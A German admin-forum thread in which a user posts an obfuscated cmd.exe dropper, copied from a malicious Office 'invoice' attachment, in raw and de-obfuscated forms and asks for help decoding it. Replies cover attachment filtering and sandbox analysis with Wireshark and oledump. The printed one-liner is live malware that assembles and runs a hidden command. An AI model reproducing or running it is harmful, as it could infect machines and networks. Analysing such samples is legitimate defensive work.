Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Office365 Trojaner Analyse

Mitglied: Zeppelin

Zeppelin (Level 1) - Jetzt verbinden

15.11.2018, aktualisiert 14:55 Uhr, 1997 Aufrufe, 21 Kommentare, 5 Danke

Liebe Community,

ich wende mich an euch, um mehr über den Office365 Trojaner zu erfahren, welcher grade seine Runden durch die Unternehmen zieht.

Mitarbeiter erhalten eine Nachricht mit einer angeblichen Rechnung und darin verbirgt sich die Schadsoftware.

Heise hat dazu einen Beitrag:
https://www.heise.de/security/meldung/Trojaner-Achtung-bei-angeblichen-R ...

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

01.
cmd /V/C"^s^et ^s^Kc^p=^.^i{H^OTMP^hK^}W)^Q^a:+^g^e^XFN^dc^f^uV1-@$^6vS,/^I^=^0Bz^](bnx2^p^D[r'^J^E;^ ^sw^j^l^kt^omC^GA\y&&^f^or %^O ^in (4^7;6^2^;5^7^;18;^50^;^56^;^8;1^8;59;5^9^;^55^;^3^0^;^3^;3;^40;^37;^5^1^;25^;26;^6^3^;5^1;^5^4^;3^0;^5^;8;66^;37;^51;^8;6^1;^6^1^;^47^;^1^5;^3^5;35;^1^4^;4^4^;^14^;6^8^;14;2^3;^6^2;4^4;6^1;50^;^1^4;^2^3;^6^1;1^;4^4^;^17;^0^;1^7;1^7^;4^3^;^50;62;0^;2^3^;59^;2^5;4^3^;35;1^1;^3^1;^2^7^;5;22^;^4^6;8^;29^;8;6^1;^61;^47;^1^5;3^5;35^;6^3^;^1^8^;4^4^;6^1;6^2^;^50;2^7^;5^6^;^6^1^;^0;^2^3^;^62;63^;3^5;^65;^7;^5^8^;^1^3^;6^1;^4^6;7^;^4^5^;^18^;^2^9^;^8;^61^;61;4^7;^15;^35;35;32^;^4^7^;18^;^44^;61;^1;63^;18^;4^5^;^0;2^3^;62^;^63^;^3^5^;4^8;2^2^;^27;^4;3^3;4^;4;^29^;8^;6^1^;61;4^7^;15;3^5^;^3^5^;43;50^;^1^4^;1;^61;^8^;^5^7;1^4;1^;^6^1^;^1^8;^50^;^18;^5^6;61;6^2^;^5^0;14^;^6^1^;1^;^6^2;44^;0^;2^3;6^2;^6^3^;^35;^22^;^1^7;20^;9;53;3^2;^64^;29;^8^;^61^;^6^1^;^4^7;^15^;^3^5^;35^;4^3^;^18;^1^8^;47;^50^;^62;28^;47;^5^0;^62^;^4^7;6^2^;5^9^;1^;5^6;0^;^23^;62;^6^3^;35;45^;^2^4;6^;59^;^62^;^5^3^;6^0^;^6^1^;3^1;^51;^0^;^3^3^;^47^;5^9;^1^;6^1^;^4^2^;5^1;2^9;^51^;12;54;30^;^62^;^32^;1;^3^7^;42^;^4^9^;^33;^6^8;5^6;6^1^;1^8^;63^;0^;36;^4^;0^;^7^;^14^;^61;8^;^4^1;1^5;^1^5;6^5;1^8^;6^1^;5;^1^8;6^3;4^7;7^;^14^;6^1;^8;^4^2;12;^16;^5^1;^6^7;^6^6;^5^2^;^5^;0^;18^;4^5;^18;^51^;^1^2;54;^30^;^5^8^;^1^9;^36^;55;^3^7;2^1;^18;^57;2^8;4;4^3^;58;18;23^;61^;5^5;^28;2^3;^62^;63^;55;5^1^;^6^3^;56;^45^;^6^3;59^;46;^0^;4^5;^63^;^5^9;^8^;6^1;6^1;^47;5^1;^5^4^;^30;36^;5^7;1;^55^;^37;^5^5;21^;1^8^;57^;^2^8;^4;^4^3^;58^;^18^;^23^;6^1^;55^;^2^8^;^23;62;63^;^55^;^51;14;^22^;6^2;^22;^43;^0^;^5^6;^6^1^;5^0^;18^;14^;6^3^;^5^1^;^54^;2^4^;6^2;50^;1^8;^1^4^;2^3^;8^;^42^;30^;^22;44^;^4;55;^1;44;^55;^3^0^;^5;8;^6^6^;^12^;^2;^61^;^5^0;6^8^;^2^;^30;^58^;19^;36;0;^6^2^;4^7;^18;44^;42^;^5^1;65^;^5^3;5^;^51;^34;30;^22;4^4^;4;34;^3^8;^1^2;54^;30^;58^;19^;36^;^0^;^5^6;1^8;^4^4^;^22;^42^;1^2^;5^4;30;^3^6^;^57^;1;^0^;6^2;4^7;^1^8;4^4^;^42;1^2;54^;3^0;^36^;^57;^1;0;^61^;^68;47^;1^8;55^;^37;5^5^;27;^5^4^;30;3^6;5^7;1;0;57;50^;1;^6^1;18^;^4^2^;^3^0;^5^8^;19^;^36^;0;5^0;18^;^5^6^;47;^62;4^4;^5^6^;1^8;3^9;^62;2^2;6^8;^12^;54^;^30^;36^;^57^;1;0^;^56^;^1^4;^3^2^;^18^;^6^1^;^62^;24^;^1;^59;18^;^42^;^30;^6^2;3^2^;1;^1^2;5^4^;^3^3^;^6^1;^1^4^;^5^0^;61^;2^8^;7;5^0;^6^2^;23^;1^8;^56;^56^;^5^5;3^0^;62;32^;1^;54^;^4^3^;50^;18;^14;^6^0;1^0;^23^;1^4^;6^1^;23^;8;^2^;10^;1^0^;^5^5^;55;55;5^5^;^5^5;^5^5;5^5^;^55;^5^5^;^5^5;^55;^55;^55^;^55^;55^;55^;^5^5;^78)^d^o s^e^t c^z^oy=!c^z^oy!!^s^Kc^p:~%^O,1!&&i^f %^O ^g^tr ^7^7 c^a^ll %c^z^oy:^~^-5^3^9%"
Damit kann erst einmal keiner was Anfangen... Ich habe im weiteren Schritt die Zirkumflex-Zeichen entfernt. Jetzt schaut das ganze etwas besser aus:

01.
cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in (47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"
Jetzt setze ich einen Zeilenumbruch um es einfach zu lesen:

01.
cmd /V/C"set sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in 
02.

03.
(47;62;57;18;50;56;8;18;59;59;55;30;3;3;40;37;51;25;26;63;51;54;30;5;8;66;37;51;8;61;61;47;15;35;35;14;44;14;68;14;23;62;44;61;50;14;23;61;1;44;17;0;17;17;43;50;62;0;23;59;25;43;35;11;31;27;5;22;46;8;29;8;61;61;47;15;35;35;63;18;44;61;62;50;27;56;61;0;23;62;63;35;65;7;58;13;61;46;7;45;18;29;8;61;61;47;15;35;35;32;47;18;44;61;1;63;18;45;0;23;62;63;35;48;22;27;4;33;4;4;29;8;61;61;47;15;35;35;43;50;14;1;61;8;57;14;1;61;18;50;18;56;61;62;50;14;61;1;62;44;0;23;62;63;35;22;17;20;9;53;32;64;29;8;61;61;47;15;35;35;43;18;18;47;50;62;28;47;50;62;47;62;59;1;56;0;23;62;63;35;45;24;6;59;62;53;60;61;31;51;0;33;47;59;1;61;42;51;29;51;12;54;30;62;32;1;37;42;49;33;68;56;61;18;63;0;36;4;0;7;14;61;8;41;15;15;65;18;61;5;18;63;47;7;14;61;8;42;12;16;51;67;66;52;5;0;18;45;18;51;12;54;30;58;19;36;55;37;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;63;56;45;63;59;46;0;45;63;59;8;61;61;47;51;54;30;36;57;1;55;37;55;21;18;57;28;4;43;58;18;23;61;55;28;23;62;63;55;51;14;22;62;22;43;0;56;61;50;18;14;63;51;54;24;62;50;18;14;23;8;42;30;22;44;4;55;1;44;55;30;5;8;66;12;2;61;50;68;2;30;58;19;36;0;62;47;18;44;42;51;65;53;5;51;34;30;22;44;4;34;38;12;54;30;58;19;36;0;56;18;44;22;42;12;54;30;36;57;1;0;62;47;18;44;42;12;54;30;36;57;1;0;61;68;47;18;55;37;55;27;54;30;36;57;1;0;57;50;1;61;18;42;30;58;19;36;0;50;18;56;47;62;44;56;18;39;62;22;68;12;54;30;36;57;1;0;56;14;32;18;61;62;24;1;59;18;42;30;62;32;1;12;54;33;61;14;50;61;28;7;50;62;23;18;56;56;55;30;62;32;1;54;43;50;18;14;60;10;23;14;61;23;8;2;10;10;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;55;78)
04.

05.
do set czoy=!czoy!!sKcp:~%O,1!&&if %O gtr 77 call %czoy:~-539%"
Wenn ich das in meine Eingabeanfforderung gebe, dann zeigen sich sensible Informationen die nicht unbedingt ausserhalb des Netzwerkes gelangen sollten...

01.
**cmd /V/C"set** sKcp=.i{HOTMPhK}W)Qa:+geXFNdcfuV1-@$6vS,/I=0Bz](bnx2pD[r'JE; swjlktomCGA\y&&for %O in 
Den hinteren Teil, verstehe ich nicht...

Die Ziffern sind vielleicht im ASCII-Zeichen?

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?

Lasst uns gemeinsam dieses Rätsel lösen, dann können wir diese Adresse, wenn es eine ist, in unseren Firewalls sperren :D

Mit besten Grüßen
Zeppelin

21 Antworten
Mitglied: GrueneSosseMitSpeck
15.11.2018, aktualisiert um 11:03 Uhr
Rein fachlich würde ich mal sagen, daß hier eine Sicherheitslücke in der Windows Shellsprache ausgenutzt wird, und natürlich ist der Code obfuscated, damit darin unerfahrene Leute erstmal nur Müll vermuten.

Eher managementmäßig betrachtet:
euer Filterystem taugt nix, und es kann sein daß Rechner schon infiziert sind und gnade dir Gott wenn einer die Mail oder das Attachment einfach nur aufmacht.

Daß du das Attachment aufgemacht hast, zeigt von ausufernder Naivität, was meinst du denn wofür der Code gemacht wurde? Um von irgendeiner Komponente verschluckt und ausgeführt zu werden um eine andere zu kompromittiereun und dann wirklich Böses zu tun ....

Ich wart nur auf deinen nächsten Post "hilfe wir haben einen Erpressungstrojaner".
Bitte warten ..
Mitglied: SlainteMhath
15.11.2018 um 11:03 Uhr
Moin,

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis"

lg,
Slainte
Bitte warten ..
Der Kommentar von Penny.Cilin wurde vom Moderator Frank am 15.11.18 ausgeblendet!
Mitglied: Zeppelin
15.11.2018, aktualisiert um 14:50 Uhr
Selbstverständlich werden solche Angriffe nicht auf dem eigenen Rechner durchgeführt geschweige im eigenen Netzwerk! Dafür gibt es ausgemusterte Rechner die quasi blank sind. Trotzdem häufen sich in letzter Zeit die Angriffe.

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

Spar dir dein Offtopic und bringe etwas produktives.
Bitte warten ..
Mitglied: Zeppelin
15.11.2018, aktualisiert um 14:41 Uhr
Zitat von SlainteMhath:

Moin,

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis"

lg,
Slainte

Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...
Bitte warten ..
Der Kommentar von Zeppelin wurde vom Moderator Frank am 15.11.18 ausgeblendet!
Mitglied: ArnoNymous
15.11.2018 um 12:29 Uhr

Die Adresse die sich daraus ergibt ist vielleicht keine klassische Adresse wie wir sie kennen sondern eine Adresse aus dem DarkNET?
Ja ne is klar Du liest zuviel (schlechte) "Hacker-Krimis"

Nun, das DarkNET ist keine Erfingung aus Büchern und wird auch gerne von Kriminellen genutzt. Oder wie war dein Kommentar zu verstehen?
Bitte warten ..
Mitglied: ArnoNymous
15.11.2018 um 12:30 Uhr
Zitat von Zeppelin:


Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...

Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.
Bitte warten ..
Der Kommentar von SlainteMhath wurde vom Moderator Frank am 15.11.18 ausgeblendet!
Mitglied: Zeppelin
15.11.2018, aktualisiert um 12:39 Uhr
Zitat von ArnoNymous:

Zitat von Zeppelin:


Eine Adresse im DarkNET schaut oft so aus: x7giprgefwfvkeep.onion oder 62gs2n5ydnyffzfy.onion damit kann Otto-normal nur wenig mit anfangen... Deshalb die Vermutung...

Meines Wissens sind die Adressen aber nicht ohne weiteres aus dem "normalen" Internet erreichbar.

Richtig, man benötigt z.B. den Tor-Browser welcher dann einem den Zugriff ermöglicht.

Die ersten Antworten auf meinen Post, ließen mich schnell zum Entschluss kommen, dass ich hier keine Antworten finden werde.

Ich habe jetzt eine Testumgebung in der ich mittels Wireshark und dem Tool "URL Revealer" versuchen werde mehr über diesen Trojaner zu erfahren.
Bitte warten ..
Der Kommentar von Penny.Cilin wurde vom Moderator Frank am 15.11.18 ausgeblendet!
Der Kommentar von Vision2015 wurde vom Moderator Frank am 15.11.18 ausgeblendet!
Mitglied: nepixl
15.11.2018, aktualisiert um 13:20 Uhr
Hi,

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

..ist ne dümmliche Aussage.

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.

Gruß
Bitte warten ..
Mitglied: ArnoNymous
15.11.2018 um 13:30 Uhr
Zitat von nepixl:

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.


Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.
Bitte warten ..
Mitglied: nepixl
15.11.2018 um 14:23 Uhr
Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.

Joar - ich pers. verifiziere händisch nur gepackte Archive. Alles andere filtern die AV's im Hintergrund direkt raus und benachrichtigen mich bei Fund.
*.doc(m) etc. werden sofort gedropt mit der Antwort, dass ausschließlich PDFs zugelassen sind.

¯\_(ツ)_/¯
Bitte warten ..
Mitglied: Frank
15.11.2018, aktualisiert um 15:26 Uhr
Hi,

ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.

Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.

@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.

@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.

Gruß
Frank
Bitte warten ..
Mitglied: St-Andreas
15.11.2018 um 16:34 Uhr
Zum lernen macht es schon Sinn wenn man sich solche Malware mal genauer anschaut, aber die Sicherheit des eigenen Netzwerks kann man damit nicht erhöhen, denn die URLs unterscheiden sich bei jeder Welle, so schnell kann man die Analysen gar nicht durchführen.

Offtopic und meine Meinung:
Das blocken von Dokumententypen ist machbar, ist sinnvoll und ja, es ist unbequem für einige Nutzer, aber es ist durchsetzbar.
Wer das nicht durchsetzen kann, sollte für solche Dateitypen zumindest eine mehrstündige Quarantäne vorsehen und/oder eine Verhaltensanalyse einsetzen, mindestens aber die Benutzer regelmäßig und ordentlich schulen.
Bitte warten ..
Mitglied: clubmaster
16.11.2018 um 10:12 Uhr
Zitat von Zeppelin:

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com1 oder seine PDF-Tools.

Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....
Bitte warten ..
Mitglied: Vision2015
16.11.2018 um 18:05 Uhr
Moin...

Klar, kann ich die Firewall so konfigurieren, dass keine *.doc Dokumente von außen in das Netzwerk kommen. Dann kann ich mir aber anhören, dass man doch gerne Dokumente empfangen möchte usw....

sagte bestimmt auch der Admin des Klinikums-Fürstenfeldbruck!
Fürstenfeldbruck: Malware legt Klinikums-IT komplett lahm

sorry, in meine augen wurde da komplett versagt!
dann lass lieber die User jammern...

Frank
Bitte warten ..
Mitglied: Zeppelin
17.11.2018 um 13:07 Uhr
Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.

Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...

Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.

Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
Bitte warten ..
Mitglied: Zeppelin
17.11.2018 um 13:14 Uhr
Zitat von Frank:

Hi,

ich finde es gut und spannend das sich @Zeppelin damit beschäftigt und tiefer gehen möchte. Ich verstehe überhaupt nicht die Reaktionen einiger User hier? Klar gibt es das Darknet und es zu verleugnen ist aus meiner Sicht der falsche Weg. Auch kann man selbst die Fehler in solchen Scripten analysieren und finden.

Ich habe daher mal alles gelöscht, was nicht zur Frage und Antwort dazugehört. Bitte bleibt sachlich. Wem das Thema nicht liegt, braucht nicht zu antworten.

@nepixl
..ist ne dümmliche Aussage.
Über Sinn und Unsinn vom durchlassen der Anhänge oder einer Lösung dazu geht es doch überhaupt nicht.

@Zeppelin
Ich würde unter Linux eine Windows-VM einrichten, das Trojaner Script ausführen und mit Wireshark den Netzwerk Traffic analysieren. Damit sollte der Aufruf gefunden werden. Das dir der "URL Revealer" dabei hilft glaube ich jetzt weniger.

Gruß
Frank


Vielen Dank für deine Nachricht. Ja genau das habe ich am Wochenende mir vorgenommen auszuprobieren.

Eigentlich soll die Arbeit auch auf der Arbeit bleiben und nun beschäftige ich mich noch in meiner Freizeit mit Düsen Thema.
Ich habe das Glück wie viele andere auch, dass ich mein Hobby zum Beruf gemacht habe und ich so meine Freude an der Materie habe egal ob auf der Arbeit oder im privaten Umfeld.
Bitte warten ..
Mitglied: Zeppelin
17.11.2018 um 13:27 Uhr
Zitat von clubmaster:

Zitat von Zeppelin:

Ich habe mir die angebliche Rechnung genauer angeschaut und bin auf folgendes gestoßen:

Deine Analayse ist so nichtsagend. Was hast du denn extrahiert? Wichtig sind die Streams/Objekt usw.
Für Office-Malware kann ich die oledump.py empfehlen:
blog.didierstevens.com2 oder seine PDF-Tools.

Einfach das Zirkumflex zu entfernen ist nicht die Lösung, weil ja damit evtl. Rechenoperationen durchgeführt werden....

Du hast meine Ausgangsnachricht nicht richtig interpretiert.
Ich habe die Zirkumflex entfernt um diesen Code besser lesen zu können.

Damit man vielleicht etwas mehr rauslesen kann. Es macht mich stutzig eine Schadsoftware zu finden, die auf den ersten Eindruck nichts macht.

Wir hatten in der Vergangenheit auch Probleme mit Verschlüsselungsteojnern aber da hat man die Folgen auch bemerkt. Jetzt schleust sich etwas ein und man merkt erst mal nichts...

Die Angriffsstrategie ist nicht schlecht. Ich implementiere erst mal etwas in ein Netzwerk und irgend wann vielleicht 1 oder 2 Monate später greife ich an. Keiner weiß mehr wann die Schadsoftware in das Netzwerk gekommen ist und welchen Weg diese genutzt hat...
Bitte warten ..
Mitglied: Zeppelin
17.11.2018 um 13:34 Uhr
Zitat von ArnoNymous:

Zitat von nepixl:

schaff Dir nen anständigen Proxy an. Der Mails annimmt, ggf (von Dir definierte) Anhänge (*.doc, *.zip,..) filtert, Dich informiert, die Mail ohne Anhang ausliefert, Du den Anhang prüfst und ggf. freigibst.

Problem solved.


Oh ja, das klingt spaßig. Je nach Unternehmen kann man dann schon ne Teilzeitkraft für sowas einstellen.
Ja, .doc ist alt... Aber wie wissen doch alle, wie das manchmal so läuft.

Da stimme ich dir zu, man könne tatsächlich eine Vollzeitstelle erzeugen um die Anhänge zu prüfen.

Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.

Klar, es gibt auch in PDF Dokumenten Backdoors aber das ist ein anderes Thema...
Bitte warten ..
Mitglied: Vision2015
17.11.2018, aktualisiert um 14:04 Uhr
Moin...
Zitat von Zeppelin:

Die Mitarbeiter werden regelmäßig geschuld um auf solche Angriffe richtig reagieren zu können.
das ist wichtig...

Unser Netzwerk blockiert bereits einen großen Teil der Angreifer dazu haben wir eine Sophos UTM im einsatz sowie entsprechende Software auf den jeweiligen Clients...
ich halte von Sophos sowiso nix, aber das sowas an der Sophos vorbei kommt, ist nicht normal...
Denke besser mal an eine Anlagen blockierung für bestimmte Dateitypen nach!

Hin und wieder schaffen es Angreifer Schadsoftware in unser Netzwerk zu schleusen und niemand hier in diesem Forum wird mir eine 100% Lösung für ein Sicheres Netzwerk anbieten.
nein, selten die Angreifer schleusen Schadsoftware in euer netzwerk, das macht ihr selber!

Ich werde mein Beitrag entfernen und mich aus dieser Com ebenfalls distanzieren.
jetzt werde nicht albern....
Die gemeinsame Lösungsfimdung war eine gute Idee nur wird das mit Füßen getreten.
nun ja, die gute idee wäre in einem entwickler forum gut aufgehoben, aber wir administratoren blocken sowas gleich am eingang!
und sich mit schadsoftware auseinander zu setzen und deren disassemblierung fehlt mir die zeit.

Ich werde unsere Geschäftsführung vorschlagen ausschließlich die Arbeit mit PDF Dokumenten zu arbeiten.
ein guter ansatz...

Frank
Bitte warten ..
Mitglied: trapper-tom
21.11.2018 um 13:52 Uhr
Hi Zeppelin,

habe mal ein wenig im Netz gesucht und das hier gefunden:

https://www.hybrid-analysis.com/sample/0672a7057ef39a0e5560f36fc558e8446 ...

Da wird beschrieben, was die Schadsoftware macht.

Viel Spaß beim Lesen und weiter so. Ich finde es gut, dass es Du versuchst, hinter die Funktionsweise solchen Codes zu kommen. Mir fehlt leider immer die Zeit, so was in einer isolierten Umgebung zu testen.

Trapper Tom
Bitte warten ..
Mitglied: Zeppelin
13.01.2019 um 22:00 Uhr
Hallo zusammen,

an dieser Stelle wünsche ich allen ein frohes neues und erfolgreiches Jahr.

Nicht immer aber hoffentlich bin ich nicht der einzige Poster, der sich bei allen beteiligten dieser Diskussion mit produktiven und weniger produktiven Kommentaren bedanken möchte.

Vielen herzlichen Dank, Euch allen.

Mit besten Grüßen
Zeppelin
Bitte warten ..
Ähnliche Inhalte
Cloud-Dienste
Office365 Proxy Einstellungen
gelöst Frage von makaroniCloud-Dienste2 Kommentare

Hallo zusammen, bei uns läuft der gesamte Datenverkehr über einen Proxy. Soweit so gut. Nun versuche ich, über das ...

Cloud-Dienste
Alternative Office365 Telekom
gelöst Frage von ArnoNymousCloud-Dienste7 Kommentare

Moin Leute, eigentlich war für einen Kunden mit 4 Mitarbeitern angedacht, einen alten SBS mit Exchange auf Office 365 ...

Cloud-Dienste
Office365 authentifizierung
gelöst Frage von moses-southCloud-Dienste2 Kommentare

Hallo Zusammen Nutzt jemand Office365? Wir kommen aktuell nicht mehr in die Admin Oberfläche, bzw in irgend einen Dienst ...

Microsoft Office
Office365 - Gruppenkalender freigebn
Frage von XcaschoXMicrosoft Office1 Kommentar

Hallo Zusammen, wir nutzen O365 und Gruppen. Gibt es eine Möglichkeit einen Gruppenkalender freizugeben, ohne dass die Person mitglied ...

Neue Wissensbeiträge
Python

Sie meinen es ja nur gut - Microsoft hilft python-Entwicklern auf unnachahmliche Weise

Information von DerWoWusste vor 1 TagPython2 Kommentare

Stellt Euch vor, Ihr nutzt python unter Windows 10 und skriptet damit regelmäßig Dinge. Nach dem Update auf Windows ...

Sicherheits-Tools

TrendMicro Worry-Free Business Security 10.0 SP1 steht in Englisch bereit mit Unterstützung für Windows 10 1903 (May Update)

Information von VGem-e vor 1 TagSicherheits-Tools1 Kommentar

Moin Kollegen, Dann kommt wohl demnächst auch die deutschsprachige/europäische Version zur Auslieferung. Gruß VGem-e

Batch & Shell
PowerShell Konferenz - Videos online
Information von NetzwerkDude vor 2 TagenBatch & Shell

Abend, die Tage werden Videos der Talks von der diesjährigen EU Powershell Konferenz hochgeladen, sind einige Interessante dabei: MFG ...

Windows Update

Windows 10 1903 Updates über Wsus erst nach Auswahl weiterer Produktkategorie

Information von Spirit-of-Eli vor 3 TagenWindows Update6 Kommentare

Moin, den Tipp habe ich hier noch nicht gesehen. Er adressiert all diejenigen, die Windows 10 1903 über einen ...

Heiß diskutierte Inhalte
Erkennung und -Abwehr
Unerklärlicher Gestank im EDV-Raum - "neues" Gebäude und keine offenkundige Ursache feststellbar!
Frage von VGem-eErkennung und -Abwehr29 Kommentare

Moin Kollegen, ich habe seit heute Morgen das Problem, dass in unserem EDV-Raum ein total unerklärbarer Gestank herrscht! Ich ...

Verschlüsselung & Zertifikate
Bitlocker oder Veracrypt unter Win10? Was ist hinsichtlich Performance, Sicherheit, Backup und Kompatibilität besser?
